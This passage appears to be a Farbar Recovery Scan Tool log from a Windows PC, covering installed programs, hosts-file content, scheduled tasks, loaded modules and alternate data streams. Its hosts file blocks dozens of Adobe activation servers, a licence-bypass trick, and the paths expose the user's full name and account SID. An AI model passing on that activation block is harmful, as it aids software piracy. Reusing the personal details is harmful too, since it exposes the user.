RoxioNow Player (HKLM-x32\...\{0EDEB615-1A60-425E-8306-0E10519C7B55}) (Version: 1.9.5.103 - RoxioNow)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SmartSound Common Data (HKLM-x32\...\InstallShield_{B8A2869E-30CA-40C5-9CF8-BD7354E57EF8}) (Version: 1.1.0 - SmartSound Software Inc.)
SmartSound Common Data (x32 Version: 1.1.0 - SmartSound Software Inc.) Hidden
SmartSound Quicktracks 5 (HKLM-x32\...\InstallShield_{2F8BA3FD-1FA9-4279-B696-712ABB12F09F}) (Version: 5.1.6 - SmartSound Software Inc.)
SmartSound Quicktracks 5 (x32 Version: 5.1.6 - SmartSound Software Inc.) Hidden
SmartSound Quicktracks for Premiere Elements 9.0 (HKLM-x32\...\InstallShield_{6748E773-5DA0-4D19-8AA5-273B4133A09B}) (Version: 3.12.3090 - SmartSound Software Inc)
SmartSound Quicktracks for Premiere Elements 9.0 (x32 Version: 3.12.3090 - SmartSound Software Inc) Hidden
SoftwareLite (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{1d57b92d}) (Version: - Software Publisher) <==== ATTENTION
Sweetest Thing (HKLM-x32\...\BFG-Sweetest Thing) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.1 - Synaptics Incorporated)
Tango (HKU\S-1-5-21-2813116197-4237973809-2954861823-1001\...\Tango) (Version: 1.6.14117 - TangoMe, Inc.)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version: - )
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.3) (Version: 1.3.3 - Xvid Team)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Restore Points =========================

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2012-02-17 16:42 - 00001805 ___RA C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 3dns.adobe.com 3dns-1.adobe.com 3dns-2.adobe.com 3dns-3.adobe.com 3dns-4.adobe.com activate.adobe.com activate-sea.adobe.com activate-sjc0.adobe.com activate.wip.adobe.com
127.0.0.1 activate.wip1.adobe.com activate.wip2.adobe.com activate.wip3.adobe.com activate.wip4.adobe.com adobe-dns.adobe.com adobe-dns-1.adobe.com adobe-dns-2.adobe.com adobe-dns-3.adobe.com adobe-dns-4.adobe.com
127.0.0.1 adobeereg.com practivate.adobe practivate.adobe.com practivate.adobe.newoa practivate.adobe.ntp practivate.adobe.ipp ereg.adobe.com ereg.wip.adobe.com ereg.wip1.adobe.com
127.0.0.1 ereg.wip2.adobe.com ereg.wip3.adobe.com ereg.wip4.adobe.com hl2rcv.adobe.com wip.adobe.com wip1.adobe.com wip2.adobe.com wip3.adobe.com wip4.adobe.com
127.0.0.1 www.adobeereg.com wwis-dubc1-vip60.adobe.com www.wip.adobe.com www.wip1.adobe.com
127.0.0.1 www.wip2.adobe.com www.wip3.adobe.com www.wip4.adobe.com wwis-dubc1-vip60.adobe.com crl.verisign.net CRL.VERISIGN.NET ood.opsource.net

There are 1 more lines.

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00DE99B8-DFBC-4149-8066-A37C50C1D789} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {01F1B12E-A2AF-41D1-9B5D-0EBC9FB2DFF2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {03C5FA32-C103-421D-9212-801E7DBE74B9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {0710601F-63C7-4ECE-B80B-509B59BBB3D6} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {112C0C99-41EB-40BA-B462-D2918DD59470} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {11CC4F29-A58E-45EB-BA60-AC453E2AFB22} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {1229EC21-A2E9-4427-A75A-CC89848EC0B5} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {122F4B1E-0A5F-45CB-A98F-ECE1D2584301} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {1F9D282D-5FD8-445A-9FC2-99B57FF3385E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {22B8C5DF-0407-4997-B4BE-BF090092A842} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {2669C11F-2F1D-4BD6-A5C6-458C4A296AF6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {372EF667-968E-4EEB-ADAA-5153B8E0CA99} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3842C89B-C81F-4A34-AE04-408EE0AD5A94} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {3B4B2FEB-CFB2-4C46-B400-5C7B17190194} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {409668D3-6767-48FD-8092-F9F52B383387} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{4ED59BE2-DDE9-40E9-B7E5-E736C598DC80}.exe
Task: {47EFAF52-B336-47A1-87ED-B5D8FD1F3831} - System32\Tasks\{DA1A727E-2202-41C7-BA20-005F6EB09038} => pcalua.exe -a "C:\Users\christopher lane\Downloads\DVC100v340.exe" -d "C:\Users\christopher lane\Desktop"
Task: {492992B9-CDA7-4F79-A770-3D492E416DF0} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {497165D4-5ED6-4747-A3A7-8C2B437879B0} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001UA => C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {50D82459-220F-435A-9017-246224ACF2C5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2015-10-14] (Microsoft)
Task: {58BB53CA-C89E-4295-A525-6F54BB99D339} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5B7DCE6E-D60D-4052-B842-1834B69679E9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {5D1A8D88-C086-4167-A5AC-60E5596B4677} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-08-27] (Dropbox, Inc.)
Task: {5DF7E406-A2E6-448A-8550-275B91C92281} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {5FB2828C-63ED-4ED1-897F-BFD70D6AD5BE} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {600A9DD1-7F91-4C49-9C5D-4A20974C878B} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {65242152-7F62-4FEC-817C-C53A3C5949FE} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-09-29] (Hewlett-Packard)
Task: {670520D0-3076-4F36-A0BF-0CCD8E05B75A} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2011-08-01] (Microsoft Corporation)
Task: {6CF144D6-9486-4D3F-B22E-0B2EF3FFDC0B} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {743C73BE-BB3E-4A3E-A04B-A103EEA732D2} - System32\Tasks\{52C5C532-AD6E-400C-9FA8-C8F3334D7162} => pcalua.exe -a "C:\Users\christopher lane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MSZRALGD\DivXInstaller.exe" -d "C:\Users\christopher lane\Desktop"
Task: {7481CF7F-8B5A-428C-A756-C43F8BABD82D} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {7FD5C3FC-3D1C-4F61-BC29-E01584E5E119} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {8155B00D-0CE2-40D0-BAEA-2792A1FE2605} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {8578261C-81BA-4BEB-8448-398896BF04DF} - System32\Tasks\{CCF13946-4492-437B-ADDD-F2E55FB7962B} => pcalua.exe -a "C:\Users\christopher lane\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7FNKX17A\PCLEUSB2x32.exe" -d "C:\Users\christopher lane\Desktop"
Task: {85B2B832-767A-4553-9C17-C9C8F287ABB9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {86793CD5-F4A1-4DFE-A771-96DA21B31342} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {8A4A5F2F-0FF7-42FC-AD2D-81304A9453A9} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {992E1713-B5F8-4DE9-943D-E240391BDD94} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-09-21] (Adobe Systems Incorporated)
Task: {9B29B7B6-FD01-44EC-B36E-142D7D6B1743} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {A3550BBB-58AD-4EF0-9DB9-12BA9CA54050} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-03-22] (CyberLink)
Task: {A5C907FD-EC5E-4BDD-BA2C-90EE748890C7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Ghost Resign Task => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\HPResignFileLoader.exe [2015-10-14] (Microsoft)
Task: {AB3FC943-C92B-41FF-A7D0-B12F2DDDABCB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {AB608511-1FF5-40DD-ACD8-FD91FA7A1AE9} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {AE45B2CE-660C-4BE3-AA91-0FFAE3A1DAC2} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001Core => C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {B3C99767-7701-4EB3-A03D-D896D75794C5} - System32\Tasks\Microsoft\Windows\SetupSQMTask => C:\WINDOWS\SYSTEM32\OOBE\SETUPSQM.EXE [2015-07-09] (Microsoft Corporation)
Task: {B4424830-36F4-4FE5-AC2C-04CB705307AE} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {BDB9C31B-D9B0-40E7-9CB3-2F18E1B11738} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {C0D5C742-8054-4251-B194-E6A421029B2C} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2011-01-31] ()
Task: {C7907EBD-82A1-4F10-ABCB-0C460DEFD4F8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {CDC04496-BCEE-41C6-97E8-9779E64F36FC} - System32\Tasks\AdobeAAMUpdater-1.0-christopherlane-christopher lane => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-09-16] (Adobe Systems Incorporated)
Task: {D1F21C7C-8B01-4D94-A2CC-C3B5F844C5B6} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {D29D4C4E-A5D0-4C33-B8FC-D60469D71774} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D4E17BFF-719F-4603-B432-D3D176953ADF} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {DE59F039-AE34-4FCB-8332-BE092F431D28} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe
Task: {E2D269DB-934A-4E8B-B3CB-400B9890BB6A} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E53A68D3-72C3-4B70-837B-74DA46E82DFB} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {E6A99D20-8EB8-4D05-82B9-83FD8E67F861} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-08-27] (Dropbox, Inc.)
Task: {EE6293C9-7293-4CBD-AE89-645E59750396} - System32\Tasks\HPCeeScheduleForchristopher lane => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {F0B6E4E7-7AF0-4B39-A8EB-8AE7B717EBAC} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {F109D137-2C8F-4008-8F08-5C45DF6C7836} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {F4AB9B2A-6AC3-417E-BA5A-EBAEBD6E2986} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {F88C74D9-9881-4D45-89EA-AB0AD3FCF5E9} - System32\Tasks\Games\UpdateCheck_S-1-5-21-2813116197-4237973809-2954861823-1001
Task: {FB49A970-B3F3-4DE2-9B0C-C8D7C8A194F6} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {FB59AFFF-AAAB-41F9-A76E-4CAC68D4D517} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {FD84DDEA-8FF8-42AA-BD47-04E83C7846FC} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {FF706C93-9C2A-4B1B-9805-71E29585B56D} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{4ED59BE2-DDE9-40E9-B7E5-E736C598DC80}.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001Core.job => C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2813116197-4237973809-2954861823-1001UA.job => C:\Users\christopher lane\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForchristopher lane.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (Whitelisted) ==============

2015-09-09 22:08 - 2015-09-09 22:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-09 22:08 - 2015-09-09 22:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-01-20 22:35 - 2015-01-20 22:35 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-10-11 15:40 - 2015-09-16 23:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-20 21:47 - 2015-09-20 21:47 - 02814464 _____ () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll
2010-01-09 20:17 - 2010-01-09 20:17 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 08794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2015-09-20 21:47 - 2015-09-20 21:47 - 02217472 _____ () C:\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll
2015-10-11 15:40 - 2015-09-16 23:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-11 15:37 - 2015-09-16 22:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-10-11 15:41 - 2015-09-16 22:44 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-10-11 15:35 - 2015-09-16 22:42 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-10-11 15:36 - 2015-09-16 22:42 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-11 15:40 - 2015-09-16 22:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-10-11 02:10 - 2015-10-11 02:10 - 00102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-02-12 20:58 - 2014-02-12 20:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01040144 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-04-21 21:52 - 2014-10-31 16:37 - 01498112 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2015-04-21 21:52 - 2014-05-19 17:19 - 00137728 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2015-10-01 22:52 - 2015-10-01 16:07 - 00166416 _____ () C:\Program Files (x86)\Dropbox\Client\EnterpriseDataAdapter.dll
2015-10-16 20:47 - 2015-10-16 20:47 - 00071168 _____ () c:\Users\christopher lane\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpo8dcui.dll
2015-10-04 15:46 - 2015-09-23 16:07 - 00012800 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick.2\qtquick2plugin.dll
2015-10-04 15:46 - 2015-09-23 16:07 - 00779776 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-10-04 15:46 - 2015-09-23 16:07 - 00056320 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-10-04 15:46 - 2015-09-23 16:07 - 00012288 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Window.2\windowplugin.dll
2015-10-16 20:20 - 2015-10-16 20:20 - 00169984 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\7a102e8cc7707b87658b28b119faa125\IsdiInterop.ni.dll
2011-05-18 19:39 - 2011-01-12 17:56 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\fmdqszsv.sys:changelist
AlternateDataStreams: C:\WINDOWS\system32\Drivers\lrvcraza.sys:changelist
AlternateDataStreams: C:\WINDOWS\system32\Drivers\pqmpvedg.sys:changelist
AlternateDataStreams: C:\ProgramData\Temp:086912D5
AlternateDataStreams: C:\ProgramData\Temp:0AF6266B
AlternateDataStreams: C:\ProgramData\Temp:0C2F9CC7
AlternateDataStreams: C:\ProgramData\Temp:0E8117B1
AlternateDataStreams: C:\ProgramData\Temp:0F775042
AlternateDataStreams: C:\ProgramData\Temp:10CFA7D4
AlternateDataStreams: C:\ProgramData\Temp:12A012A1
AlternateDataStreams: C:\ProgramData\Temp:15381DB9
AlternateDataStreams: C:\ProgramData\Temp:159A493A
AlternateDataStreams: C:\ProgramData\Temp:1656EE95
AlternateDataStreams: C:\ProgramData\Temp:16F42F1F
AlternateDataStreams: C:\ProgramData\Temp:18345E10
AlternateDataStreams: C:\ProgramData\Temp:1D8551A3
AlternateDataStreams: C:\ProgramData\Temp:1EF9DEAB
AlternateDataStreams: C:\ProgramData\Temp:20C1C66F
AlternateDataStreams: C:\ProgramData\Temp:258D2F8B
AlternateDataStreams: C:\ProgramData\Temp:26E233B5
AlternateDataStreams: C:\ProgramData\Temp:2707D83A
AlternateDataStreams: C:\ProgramData\Temp:2A26624E
AlternateDataStreams: C:\ProgramData\Temp:2A9AE786
AlternateDataStreams: C:\ProgramData\Temp:2CB9631F
AlternateDataStreams: C:\ProgramData\Temp:2CE15176
AlternateDataStreams: C:\ProgramData\Temp:2DF93164
AlternateDataStreams: C:\ProgramData\Temp:32AA69ED
AlternateDataStreams: C:\ProgramData\Temp:35629AE6
AlternateDataStreams: C:\ProgramData\Temp:366B74CA
AlternateDataStreams: C:\ProgramData\Temp:370207D1
AlternateDataStreams: C:\ProgramData\Temp:3D7186F6
AlternateDataStreams: C:\ProgramData\Temp:432EC713
AlternateDataStreams: C:\ProgramData\Temp:479B1CF9
AlternateDataStreams: C:\ProgramData\Temp:4A03F06E
AlternateDataStreams: C:\ProgramData\Temp:4AC7B5C1
AlternateDataStreams: C:\ProgramData\Temp:4C4BD66D
AlternateDataStreams: C:\ProgramData\Temp:4C8FA829
AlternateDataStreams: C:\ProgramData\Temp:52329B88
AlternateDataStreams: C:\ProgramData\Temp:5279F7BF
AlternateDataStreams: C:\ProgramData\Temp:52E5A75A
AlternateDataStreams: C:\ProgramData\Temp:57176330
AlternateDataStreams: C:\ProgramData\Temp:58AC077F
AlternateDataStreams: C:\ProgramData\Temp:5CD804FF
AlternateDataStreams: C:\ProgramData\Temp:600F6768
AlternateDataStreams: C:\ProgramData\Temp:61C6B926
AlternateDataStreams: C:\ProgramData\Temp:62ECBD75
AlternateDataStreams: C:\ProgramData\Temp:66871744
AlternateDataStreams: C:\ProgramData\Temp:67842DB7
AlternateDataStreams: C:\ProgramData\Temp:696F7DA7
AlternateDataStreams: C:\ProgramData\Temp:69B658DD
AlternateDataStreams: C:\ProgramData\Temp:6B251180
AlternateDataStreams: C:\ProgramData\Temp:6ECE93A8
AlternateDataStreams: C:\ProgramData\Temp:6F57F1D1
AlternateDataStreams: C:\ProgramData\Temp:70E897B5
AlternateDataStreams: C:\ProgramData\Temp:7804B508
AlternateDataStreams: C:\ProgramData\Temp:78D4A05B
AlternateDataStreams: C:\ProgramData\Temp:7BD9473D
AlternateDataStreams: C:\ProgramData\Temp:81943D40
AlternateDataStreams: C:\ProgramData\Temp:84C07F6B
AlternateDataStreams: C:\ProgramData\Temp:86043CD3
AlternateDataStreams: C:\ProgramData\Temp:8967C154
AlternateDataStreams: C:\ProgramData\Temp:8B69E3C3
AlternateDataStreams: C:\ProgramData\Temp:8C6D1905
AlternateDataStreams: C:\ProgramData\Temp:8E916279
AlternateDataStreams: C:\ProgramData\Temp:928DF32E
AlternateDataStreams: C:\ProgramData\Temp:9D91E651
AlternateDataStreams: C:\ProgramData\Temp:9FD2057F
AlternateDataStreams: C:\ProgramData\Temp:A103830F
AlternateDataStreams: C:\ProgramData\Temp:A1E6FE0F
AlternateDataStreams: C:\ProgramData\Temp:A3840F5B
AlternateDataStreams: C:\ProgramData\Temp:A3B8F70C
AlternateDataStreams: C:\ProgramData\Temp:A4241298
AlternateDataStreams: C:\ProgramData\Temp:A43B789A
AlternateDataStreams: C:\ProgramData\Temp:A479BCC9
AlternateDataStreams: C:\ProgramData\Temp:A4F0E644
AlternateDataStreams: C:\ProgramData\Temp:AB354A63
AlternateDataStreams: C:\ProgramData\Temp:AC543948
AlternateDataStreams: C:\ProgramData\Temp:AD727397
AlternateDataStreams: C:\ProgramData\Temp:B01EC114
AlternateDataStreams: C:\ProgramData\Temp:B059B88E
AlternateDataStreams: C:\ProgramData\Temp:B60217B2
AlternateDataStreams: C:\ProgramData\Temp:B72454C6
AlternateDataStreams: C:\ProgramData\Temp:BAFAD1DF
AlternateDataStreams: C:\ProgramData\Temp:BB0E733F
AlternateDataStreams: C:\ProgramData\Temp:BC064EDB
AlternateDataStreams: C:\ProgramData\Temp:C36F1B98
AlternateDataStreams: C:\ProgramData\Temp:C3702442
AlternateDataStreams: C:\ProgramData\Temp:C6920A5D
AlternateDataStreams: C:\ProgramData\Temp:CB959782
AlternateDataStreams: C:\ProgramData\Temp:D210D539
AlternateDataStreams: C:\ProgramData\Temp:D8AE9DD1
AlternateDataStreams: C:\ProgramData\Temp:D994162E
AlternateDataStreams: C:\ProgramData\Temp:DC7EDF41
AlternateDataStreams: C:\ProgramData\Temp:DCB27118
AlternateDataStreams: C:\ProgramData\Temp:E153075C
AlternateDataStreams: C:\ProgramData\Temp:E4BC4A41
AlternateDataStreams: C:\ProgramData\Temp:E70FD81B
AlternateDataStreams: C:\ProgramData\Temp:EE69D7DF
AlternateDataStreams: C:\ProgramData\Temp:F123F8B9
AlternateDataStreams: C:\ProgramData\Temp:F4362715
AlternateDataStreams: C:\ProgramData\Temp:F5E30F6A
AlternateDataStreams: C:\ProgramData\Temp:F5FC5DCE
AlternateDataStreams: C:\ProgramData\Temp:F6910DB1
AlternateDataStreams: C:\ProgramData\Temp:F7B0AE93
